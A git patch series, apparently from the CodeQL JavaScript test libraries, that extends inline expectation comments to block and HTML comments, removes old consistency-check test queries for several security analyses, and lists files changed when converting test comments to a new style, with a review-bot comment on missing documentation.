From 79e2a758d76f143cd1c3ed2829065ca3fd3bd968 Mon Sep 17 00:00:00 2001 From: Asger F Date: Mon, 10 Feb 2025 13:27:46 +0100 Subject: [PATCH 001/115] JS: Allow more kinds of expectation comments --- .../test/internal/InlineExpectationsTestImpl.qll | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll index 9e92f70af69f..42eb94230ae6 100644 --- a/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll +++ b/javascript/ql/lib/utils/test/internal/InlineExpectationsTestImpl.qll @@ -4,14 +4,22 @@ private import codeql.util.test.InlineExpectationsTest module Impl implements InlineExpectationsTestSig { private import javascript - final private class LineCommentFinal = LineComment; + final class ExpectationComment = ExpectationCommentImpl; - class ExpectationComment extends LineCommentFinal { - string getContents() { result = this.getText() } + class Location = JS::Location; + + abstract private class ExpectationCommentImpl extends Locatable { + abstract string getContents(); /** Gets this element's location. */ Location getLocation() { result = super.getLocation() } } - class Location = JS::Location; + private class JSComment extends ExpectationCommentImpl instanceof Comment { + override string getContents() { result = super.getText() } + } + + private class HtmlComment extends ExpectationCommentImpl instanceof HTML::CommentNode { + override string getContents() { result = super.getText() } + } } From 7e5c24a8ec732346b3e464d9bef92a1b6118b68e Mon Sep 17 00:00:00 2001 
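Review bot: The new public `final class ExpectationComment = ExpectationCommentImpl;` and the abstract `getContents()` it exposes carry no QLDoc, and neither do `JSComment` and `HtmlComment`, so nothing states which comment kinds now count as expectation comments; add `/** A JavaScript or HTML comment that may carry inline test expectations. */` above the alias and `/** Gets the text of this comment in which expectations are looked for. */` above `abstract string getContents();`. Replacing `LineComment` with `Comment` in `JSComment` also admits block and JSDoc comments; if the shared framework attaches an expectation to its comment's start line, an expectation written inside a multi-line block comment is presumably bound to the wrong line, which deserves either a test file covering that case or a sentence in the QLDoc saying expectations must sit on the comment's first line. The same consideration applies to `HtmlComment`, since an `HTML::CommentNode` can span several lines as well.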
From: Asger F Date: Tue, 4 Feb 2025 12:48:51 +0100 Subject: [PATCH 002/115] JS: Remove uses of old inline expectation test library --- .../CWE-022/TaintedPath/Consistency.expected | 0 .../CWE-022/TaintedPath/Consistency.ql | 9 -------- .../Security/CWE-073/Consistency.expected | 0 .../Security/CWE-073/Consistency.ql | 3 --- .../Security/CWE-078/Consistency.expected | 0 .../Security/CWE-078/Consistency.ql | 23 ------------------- .../ConsistencyDomBasedXss.expected | 0 .../DomBasedXss/ConsistencyDomBasedXss.ql | 9 -------- .../ConsistencyExceptionXss.expected | 0 .../ExceptionXss/ConsistencyExceptionXss.ql | 3 --- .../ConsistencyReflectedXss.expected | 0 .../ReflectedXss/ConsistencyReflectedXss.ql | 3 --- .../StoredXss/ConsistencyStoredXss.expected | 0 .../CWE-079/StoredXss/ConsistencyStoredXss.ql | 3 --- ...ConsistencyUnsafeHtmlConstruction.expected | 0 .../ConsistencyUnsafeHtmlConstruction.ql | 3 --- .../ConsistencyUnsafeJQueryPlugin.expected | 0 .../ConsistencyUnsafeJQueryPlugin.ql | 3 --- .../ConsistencyXssThroughDom.expected | 0 .../XssThroughDom/ConsistencyXssThroughDom.ql | 14 ----------- .../CWE-089/untyped/Consistency.expected | 0 .../Security/CWE-089/untyped/Consistency.ql | 4 ---- .../Security/CWE-502/Consistency.expected | 0 .../Security/CWE-502/Consistency.ql | 3 --- .../Consistency.expected | 0 .../ClientSideUrlRedirect/Consistency.ql | 9 -------- .../ResourceExhaustion/Consistency.expected | 0 .../CWE-770/ResourceExhaustion/Consistency.ql | 3 --- .../Consistency.expected | 1 - .../Consistency.ql | 16 ------------- 30 files changed, 109 deletions(-) delete mode 100644 javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql delete mode 100644 
javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql delete mode 100644 
javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql delete mode 100644 javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected delete mode 100644 javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql deleted file mode 100644
index 0183ac6ade66..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-022/TaintedPath/Consistency.ql
+++ /dev/null
@@ -1,9 +0,0 @@
-import javascript
-import semmle.javascript.security.dataflow.TaintedPathQuery
-deprecated import utils.test.ConsistencyChecking
-
-deprecated class TaintedPathConsistency extends ConsistencyConfiguration {
- TaintedPathConsistency() { this = "TaintedPathConsistency" }
-
- override DataFlow::Node getAnAlert() { TaintedPathFlow::flowTo(result) }
-}
diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql deleted file mode 100644
index eae82dc052fe..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-073/Consistency.ql
+++ /dev/null
@@ -1,3 +0,0 @@
-import javascript
-import semmle.javascript.security.dataflow.TemplateObjectInjectionQuery
-deprecated import utils.test.ConsistencyChecking
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql deleted file mode 100644
index 77e19c320dff..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-078/Consistency.ql
+++ /dev/null
@@ -1,23 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.CommandInjectionQuery as CommandInjection
-import semmle.javascript.security.dataflow.IndirectCommandInjectionQuery as IndirectCommandInjection
-import semmle.javascript.security.dataflow.ShellCommandInjectionFromEnvironmentQuery as ShellCommandInjectionFromEnvironment
-import semmle.javascript.security.dataflow.UnsafeShellCommandConstructionQuery as UnsafeShellCommandConstruction
-import semmle.javascript.security.dataflow.SecondOrderCommandInjectionQuery as SecondOrderCommandInjectionQuery
-
-deprecated class CommandInjectionConsistency extends ConsistencyConfiguration {
- CommandInjectionConsistency() { this = "ComandInjection" }
-
- override File getAFile() { not result.getBaseName() = "uselesscat.js" }
-}
-
-import semmle.javascript.security.UselessUseOfCat
-
-deprecated class UselessCatConsistency extends ConsistencyConfiguration {
- UselessCatConsistency() { this = "Cat" }
-
- override DataFlow::Node getAnAlert() { result instanceof UselessCat }
-
- override File getAFile() { result.getBaseName() = "uselesscat.js" }
-}
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql deleted file mode 100644
index 87b27a68998c..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-079/DomBasedXss/ConsistencyDomBasedXss.ql
+++ /dev/null
@@ -1,9 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.DomBasedXssQuery
-
-deprecated class ConsistencyConfig extends ConsistencyConfiguration {
- ConsistencyConfig() { this = "ConsistencyConfig" }
-
- override DataFlow::Node getAnAlert() { DomBasedXssFlow::flow(_, result) }
-}
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql deleted file mode 100644
index ec505e62e171..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-079/ExceptionXss/ConsistencyExceptionXss.ql
+++ /dev/null
@@ -1,3 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.ExceptionXssQuery as ExceptionXss
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql deleted file mode 100644
index 9019d53e10ed..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-079/ReflectedXss/ConsistencyReflectedXss.ql
+++ /dev/null
@@ -1,3 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.ReflectedXssQuery as ReflectedXss
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql b/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql deleted file mode 100644
index 38bae3a6aea6..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-079/StoredXss/ConsistencyStoredXss.ql
+++ /dev/null
@@ -1,3 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.StoredXssQuery as StoredXss
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql deleted file mode 100644
index e67885e96b96..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeHtmlConstruction/ConsistencyUnsafeHtmlConstruction.ql
+++ /dev/null
@@ -1,3 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.UnsafeHtmlConstructionQuery as UnsafeHtmlConstruction
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql b/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql deleted file mode 100644
index d7e452b2a8c1..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-079/UnsafeJQueryPlugin/ConsistencyUnsafeJQueryPlugin.ql
+++ /dev/null
@@ -1,3 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.UnsafeJQueryPluginQuery as UnsafeJqueryPlugin
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql b/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql deleted file mode 100644
index 547763a8f838..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-079/XssThroughDom/ConsistencyXssThroughDom.ql
+++ /dev/null
@@ -1,14 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.XssThroughDomQuery
-
-deprecated class ConsistencyConfig extends ConsistencyConfiguration {
- ConsistencyConfig() { this = "ConsistencyConfig" }
-
- override DataFlow::Node getAnAlert() {
- exists(DataFlow::Node source |
- XssThroughDomFlow::flow(source, result) and
- not isIgnoredSourceSinkPair(source, result)
- )
- }
-}
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql deleted file mode 100644
index 9c721994d677..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-089/untyped/Consistency.ql
+++ /dev/null
@@ -1,4 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.SqlInjectionQuery as SqlInjection
-import semmle.javascript.security.dataflow.NosqlInjectionQuery as NosqlInjection
diff --git a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-502/Consistency.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql deleted file mode 100644
index 6c43567b5c45..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-502/Consistency.ql
+++ /dev/null
@@ -1,3 +0,0 @@
-import javascript
-import semmle.javascript.security.dataflow.UnsafeDeserializationQuery
-deprecated import utils.test.ConsistencyChecking
diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql deleted file mode 100644
index e02e59dcb19a..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/Consistency.ql
+++ /dev/null
@@ -1,9 +0,0 @@
-import javascript
-import semmle.javascript.security.dataflow.ClientSideUrlRedirectQuery
-import utils.test.ConsistencyChecking
-
-deprecated class ClientSideUrlRedirectConsistency extends ConsistencyConfiguration {
- ClientSideUrlRedirectConsistency() { this = "ClientSideUrlRedirectConsistency" }
-
- override DataFlow::Node getAnAlert() { ClientSideUrlRedirectFlow::flowTo(result) }
-}
diff --git a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.expected deleted file mode 100644
index e69de29bb2d1..000000000000
diff --git a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql deleted file mode 100644
index a5da63e682d0..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-770/ResourceExhaustion/Consistency.ql
+++ /dev/null
@@ -1,3 +0,0 @@
-import javascript
-import semmle.javascript.security.dataflow.ResourceExhaustionQuery
-deprecated import utils.test.ConsistencyChecking
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected deleted file mode 100644
index 8efa3a055b19..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.expected
+++ /dev/null
@@ -1 +0,0 @@
-| lib.js:70 | expected an alert, but found none | NOT OK | Config |
diff --git a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql b/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql deleted file mode 100644
index d80f9d23ff52..000000000000
--- a/javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/Consistency.ql
+++ /dev/null
@@ -1,16 +0,0 @@
-import javascript
-deprecated import utils.test.ConsistencyChecking
-import semmle.javascript.security.dataflow.PrototypePollutingAssignmentQuery
-
-deprecated class Config extends ConsistencyConfiguration {
- Config() { this = "Config" }
-
- override File getAFile() { any() }
-
- override DataFlow::Node getAnAlert() {
- exists(DataFlow::Node source |
- PrototypePollutingAssignmentFlow::flow(source, result) and
- not isIgnoredLibraryFlow(source, result)
- )
- }
-}
From 9be041e27da36e8ccb2062e8a59be0478e3fa141 Mon Sep 17 00:00:00 2001
From: Asger F Date: Thu, 6 Feb 2025 13:34:01 +0100 Subject: [PATCH 003/115] JS: Update OK-style comments to $-style --- .../DeadAngularJSEventListener/tst.js | 26 +- .../AngularJS/DependencyMismatch/tst.js | 16 +- .../AngularJS/DisablingSce/DisablingSce.js | 10 +- .../angular-incompatible-service.js | 116 +++---- .../AngularJS/InsecureUrlWhitelist/tst.js | 30 +- .../missing-explicit-injection.js | 22 +- .../RepeatedInjection/repeated-injection.js | 20 +- .../unused-angular-dependency.js | 20 +- .../query-tests/AngularJS/UseNgSrc/tst.html | 5 +- .../query-tests/AngularJS/UseNgSrc/tst2.html | 3 +- .../AngularJS/UseNgSrc/tst_fragment.html | 3 +- .../query-tests/Comments/TodoComments/tst.js | 2 +- .../ql/test/query-tests/DOM/Alert/alert.js | 8 +- .../ql/test/query-tests/DOM/HTML/tst.js | 22 +- .../test/query-tests/DOM/TargetBlank/tst.js | 29 +- .../Declarations/ArgumentsRedefined/tst.js | 4 +- .../ArgumentsRedefined/types.d.ts | 4 +- .../Declarations/AssignmentToConst/classes.js | 3 +- .../Declarations/AssignmentToConst/const6.js | 2 +- .../AssignmentToConst/functions.js | 3 +- .../Declarations/AssignmentToConst/other.js | 2 +- .../Declarations/AssignmentToConst/tst.js | 16 +- .../Declarations/ClobberingVarInit/tst.js | 7 +- .../Declarations/DeadStoreOfGlobal/tst.js | 17 +- .../DeadStoreOfLocal/computedFieldNames.ts | 4 +- .../computedInterfaceProperty.ts | 10 +- .../DeadStoreOfLocal/exportDefaultClass.ts | 4 +- .../DeadStoreOfLocal/exportDefaultFunction.ts | 2 +- .../Declarations/DeadStoreOfLocal/extends.js | 2 +- .../DeadStoreOfLocal/for-of-continue.js | 2 +- .../DeadStoreOfLocal/namespace.ts | 2 +- .../Declarations/DeadStoreOfLocal/overload.ts | 12 +- .../Declarations/DeadStoreOfLocal/tst.js | 36 +- .../Declarations/DeadStoreOfLocal/tst2.js | 7 +- .../Declarations/DeadStoreOfLocal/tst3.js | 3 +- .../Declarations/DeadStoreOfLocal/tst3b.js | 3 +- .../DeadStoreOfProperty/accessors.js | 8 +- .../DeadStoreOfProperty/exports.js | 2 +- .../DeadStoreOfProperty/fieldInit.ts 
| 6 +- .../real-world-examples.js | 10 +- .../Declarations/DeadStoreOfProperty/tst.js | 38 +-- .../Declarations/DeclBeforeUse/jslint.js | 8 +- .../Declarations/DeclBeforeUse/tst2.js | 6 +- .../Declarations/DeclBeforeUse/typescript.ts | 4 +- .../Declarations/DuplicateVarDecl/tst.js | 5 +- .../IneffectiveParameterType/tst.js | 2 +- .../IneffectiveParameterType/tst.ts | 22 +- .../MissingThisQualifier/abstract-missing.ts | 2 +- .../ignored-by-externs.js | 2 +- .../MissingThisQualifier/ignored-by-jslint.js | 2 +- .../MissingThisQualifier/indirection.js | 4 +- .../MissingThisQualifier/missing1.js | 2 +- .../MissingThisQualifier/missing2.js | 2 +- .../MissingThisQualifier/namespaces-uses.ts | 38 +-- .../MissingThisQualifier/non-global.js | 2 +- .../not-ignored-by-jslint.js | 2 +- .../MissingThisQualifier/present1.js | 2 +- .../MissingThisQualifier/present2.js | 2 +- .../Declarations/MissingVarDecl/test.js | 30 +- .../MixedStaticInstanceThisAccess/abstract.ts | 2 +- .../instanceInstance.js | 2 +- .../instanceInstanceWithStaticExtra.js | 2 +- .../instanceStatic.js | 2 +- .../staticInstance.js | 2 +- .../staticStatic.js | 2 +- .../staticStaticWithInstanceExtra.js | 2 +- .../throughClass.js | 2 +- .../MixedStaticInstanceThisAccess/tst.js | 12 +- .../RedeclaredVariable/externs.js | 2 +- .../Declarations/RedeclaredVariable/tst.js | 2 +- .../Declarations/RedeclaredVariable/tst.ts | 6 +- .../Declarations/RedeclaredVariable/tst3.js | 2 +- .../Declarations/RedeclaredVariable/tst4.js | 8 +- .../SuspiciousMethodNameDeclaration/tst.js | 2 +- .../SuspiciousMethodNameDeclaration/tst.ts | 22 +- .../Declarations/TemporalDeadZone/tst.js | 15 +- .../Declarations/TooManyParameters/externs.js | 2 +- .../Declarations/UniqueParameterNames/tst.js | 10 +- .../Declarations/UniquePropertyNames/tst.js | 6 +- .../Declarations/UnreachableOverloads/tst.ts | 20 +- .../Declarations/UnstableCyclicImport/A.ts | 2 +- .../Declarations/UnstableCyclicImport/B.ts | 2 +- .../UnstableCyclicImport/acyclicImport.ts 
| 2 +- .../UnstableCyclicImport/exportCycleA.ts | 2 +- .../UnstableCyclicImport/exportCycleB.ts | 2 +- .../UnstableCyclicImport/safeA.ts | 2 +- .../UnstableCyclicImport/safeB.ts | 2 +- .../UnstableCyclicImport/typeA.ts | 2 +- .../Declarations/UnusedParameter/istype.ts | 4 +- .../UnusedParameter/parameter_field.ts | 4 +- .../UnusedParameter/thisparameter.ts | 2 +- .../Declarations/UnusedParameter/tst.js | 16 +- .../Declarations/UnusedParameter/tst2.js | 13 +- .../UnusedVariable/Babelrc/importPragma.jsx | 2 +- .../UnusedVariable/UnusedIndexVariable.js | 2 +- .../Declarations/UnusedVariable/decorated.ts | 10 +- .../Declarations/UnusedVariable/externs.js | 5 +- .../UnusedVariable/importWithoutPragma.jsx | 2 +- .../Declarations/UnusedVariable/importtype.ts | 4 +- .../Declarations/UnusedVariable/interTypes.ts | 2 +- .../UnusedVariable/namespaceImportAsType.ts | 6 +- .../Declarations/UnusedVariable/node.js | 2 +- .../Declarations/UnusedVariable/react-jsx.js | 2 +- .../UnusedVariable/require-react-1.js | 2 +- .../UnusedVariable/require-react-2.js | 2 +- .../UnusedVariable/require-react-3.js | 2 +- .../require-react-in-other-scope.js | 2 +- .../Declarations/UnusedVariable/thisparam.ts | 2 +- .../typeInTemplateLiteralTag.ts | 6 +- .../Declarations/UnusedVariable/typeoftype.ts | 8 +- .../Declarations/UnusedVariable/types.d.ts | 2 +- .../Declarations/UnusedVariable/underscore.js | 12 +- .../UnusedVariable/unusedShadowed.ts | 6 +- .../EnablingNodeIntegration.js | 12 +- .../Expressions/BitwiseSignCheck/tst.js | 12 +- .../Expressions/CompareIdenticalValues/tst.js | 17 +- .../Expressions/DuplicateProperty/tst.js | 14 +- .../Expressions/ExprHasNoEffect/es2015.js | 2 +- .../Expressions/ExprHasNoEffect/should.js | 2 +- .../Expressions/ExprHasNoEffect/try.js | 2 +- .../Expressions/ExprHasNoEffect/tst.js | 61 ++-- .../Expressions/ExprHasNoEffect/tst2.js | 3 +- .../HeterogeneousComparison/tst.js | 149 ++++----- .../ImplicitOperandConversion/tst.js | 65 ++-- 
.../Expressions/MissingAwait/tsTest.ts | 2 +- .../Expressions/MissingAwait/tst.js | 42 +-- .../MissingDotLengthInComparison.js | 14 +- .../Expressions/MisspelledIdentifier/tst.js | 31 +- .../Expressions/RedundantExpression/tst.js | 2 +- .../Expressions/SelfAssignment/jsdoc.js | 4 +- .../Expressions/SelfAssignment/tst.js | 15 +- .../Expressions/ShiftOutOfRange/tst.js | 4 +- .../Expressions/SuspiciousInvocation/eval.js | 8 +- .../SuspiciousInvocation/namespace.ts | 12 +- .../Expressions/SuspiciousInvocation/super.js | 5 +- .../export_equals_client.ts | 2 +- .../export_import_client.ts | 2 +- .../Expressions/SuspiciousPropAccess/tst2.ts | 2 +- .../SuspiciousPropAccess/typeassertion.ts | 4 +- .../SuspiciousPropAccess/typeoftype.ts | 4 +- .../UnboundEventHandlerReceiver/tst.js | 38 +-- .../UnclearOperatorPrecedence/tst.js | 14 +- .../UnclearOperatorPrecedence/tst.min.js | 2 +- .../UnknownDirective/UnknownDirective.html | 8 +- .../UnknownDirective/UnknownDirective.js | 66 ++-- .../global-module-definition.js | 2 +- .../module-environment-detection.js | 2 +- .../regression.js | 4 +- .../UnneededDefensiveProgramming/tst.js | 128 ++++---- .../UnneededDefensiveProgramming/tst2.js | 6 +- .../WhitespaceContradictsPrecedence/tst.js | 9 +- .../JSDoc/UndocumentedParameter/tst.js | 7 +- .../LanguageFeatures/BadTypeof/tst.js | 23 +- .../LanguageFeatures/EmptyArrayInit/tst.js | 14 +- .../ExpressionClosures/tst.js | 7 +- .../LanguageFeatures/IllegalInvocation/tst.js | 38 +-- .../LanguageFeatures/InconsistentNew/a1.js | 4 +- .../LanguageFeatures/InconsistentNew/a2.js | 4 +- .../InconsistentNew/arraycalls.js | 4 +- .../LanguageFeatures/InconsistentNew/tst.js | 8 +- .../LanguageFeatures/InvalidPrototype/tst.js | 18 +- .../LengthComparisonOffByOne/tst.js | 23 +- .../NonLinearPattern/ts-test.ts | 23 +- .../LanguageFeatures/NonLinearPattern/tst.js | 13 +- .../PropertyWriteOnPrimitive/tst.js | 18 +- .../SemicolonInsertion/tst.js | 14 +- .../SetterIgnoresParameter/tst.js | 12 +- 
